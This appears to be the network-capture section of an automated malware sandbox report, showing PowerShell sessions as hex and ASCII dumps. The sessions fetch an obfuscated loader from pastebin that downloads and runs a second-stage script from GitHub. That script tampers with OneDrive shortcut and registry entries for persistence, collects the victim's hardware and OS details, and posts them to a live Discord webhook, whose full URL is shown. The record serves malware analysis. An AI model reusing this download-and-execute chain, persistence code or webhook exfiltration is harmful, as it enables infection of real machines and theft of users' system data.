                                                                                                                        2024-10-15 13:52:57 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                                        2024-10-15 13:52:57 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                                        2024-10-15 13:52:57 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                                        2024-10-15 13:52:57 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.649944172.67.19.244435576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:53:03 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: pastebin.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:53:03 UTC396INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:03 GMT
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        x-frame-options: DENY
                                                                                                                        x-content-type-options: nosniff
                                                                                                                        x-xss-protection: 1;mode=block
                                                                                                                        cache-control: public, max-age=1801
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 33
                                                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8d304b0c990d2c91-DFW
                                                                                                                        2024-10-15 13:53:03 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                                        2024-10-15 13:53:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.649952185.199.109.1334435576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:53:04 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:53:04 UTC901INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 7508
                                                                                                                        Cache-Control: max-age=300
                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Frame-Options: deny
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:04 GMT
                                                                                                                        Via: 1.1 varnish
                                                                                                                        X-Served-By: cache-dfw-kdal2120132-DFW
                                                                                                                        X-Cache: HIT
                                                                                                                        X-Cache-Hits: 1
                                                                                                                        X-Timer: S1729000385.907727,VS0,VE1
                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Fastly-Request-ID: a6ac80a05e96432611f85ba5ed3b7956f63f2bf4
                                                                                                                        Expires: Tue, 15 Oct 2024 13:58:04 GMT
                                                                                                                        Source-Age: 32
                                                                                                                        2024-10-15 13:53:04 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                                        2024-10-15 13:53:04 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                                        2024-10-15 13:53:04 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                                        2024-10-15 13:53:04 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                                        2024-10-15 13:53:04 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                                        2024-10-15 13:53:04 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.649983162.159.138.232443420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:53:10 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Content-Type: application/json
                                                                                                                        Host: discord.com
                                                                                                                        Content-Length: 301
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:53:10 UTC301OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 33 38 58 50 53 46 5a 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43
                                                                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                                                        2024-10-15 13:53:10 UTC1354INHTTP/1.1 204 No Content
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:10 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        set-cookie: __dcfduid=d07c03fa8afc11efa79a56017482278c; Expires=Sun, 14-Oct-2029 13:53:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                        x-ratelimit-limit: 5
                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                        x-ratelimit-reset: 1729000391
                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                        via: 1.1 google
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pm%2BtHq5hXJ47cVrvEHyVG5PjRT4zHI4HN5eZLIHKdFqjMNjxMrbaBa%2Bpv2hToZMv1%2BYPobwma2lJ92an0uwrXf6VadB5zYvMJjJaZjcVdjY3h7234zK4DiVI10S"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                        Set-Cookie: __sdcfduid=d07c03fa8afc11efa79a56017482278cae5f3787c1133a8dbdc6e5cb5203af315f994a439c8055caff06d0e25330340d; Expires=Sun, 14-Oct-2029 13:53:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        Set-Cookie: __cfruid=573708c6e214ff4c588e4d35ede66ee5885d1841-1729000390; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                        2024-10-15 13:53:10 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 48 4a 72 6a 64 70 6e 4d 42 49 67 49 72 45 74 76 61 77 6d 39 75 72 2e 48 33 73 41 77 79 4e 65 39 42 48 4c 45 41 61 45 7a 6b 42 55 2d 31 37 32 39 30 30 30 33 39 30 36 31 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 62 33 37 66 64 63 66 34 37 37 34 2d 44 46 57 0d 0a 0d 0a
                                                                                                                        Data Ascii: Set-Cookie: _cfuvid=HJrjdpnMBIgIrEtvawm9ur.H3sAwyNe9BHLEAaEzkBU-1729000390616-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304b37fdcf4774-DFW


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.649997162.159.138.2324435576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-10-15 13:53:17 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                        Content-Type: application/json
                                                                                                                        Host: discord.com
                                                                                                                        Content-Length: 301
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-10-15 13:53:18 UTC301OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 33 38 58 50 53 46 5a 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43
                                                                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** L38XPSFZ\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                                                        2024-10-15 13:53:18 UTC1358INHTTP/1.1 204 No Content
                                                                                                                        Date: Tue, 15 Oct 2024 13:53:18 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Connection: close
                                                                                                                        set-cookie: __dcfduid=d4fe07208afc11ef89f6de213a7abdd7; Expires=Sun, 14-Oct-2029 13:53:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                        x-ratelimit-limit: 5
                                                                                                                        x-ratelimit-remaining: 4
                                                                                                                        x-ratelimit-reset: 1729000399
                                                                                                                        x-ratelimit-reset-after: 1
                                                                                                                        via: 1.1 google
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2z2ObZ%2B3fAFhUTZNXxSMKavwf5KdShB7XkI5QBT8Y8d6RZ06M0TSAH%2B3Vzn3sLZqxGjgbPaeHv0aOv9cL%2BzsmTCC5z32aQr%2BVQXmvgMuGFq0jgR%2BXKUVFwzDPaLO"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        X-Content-Type-Options: nosniff
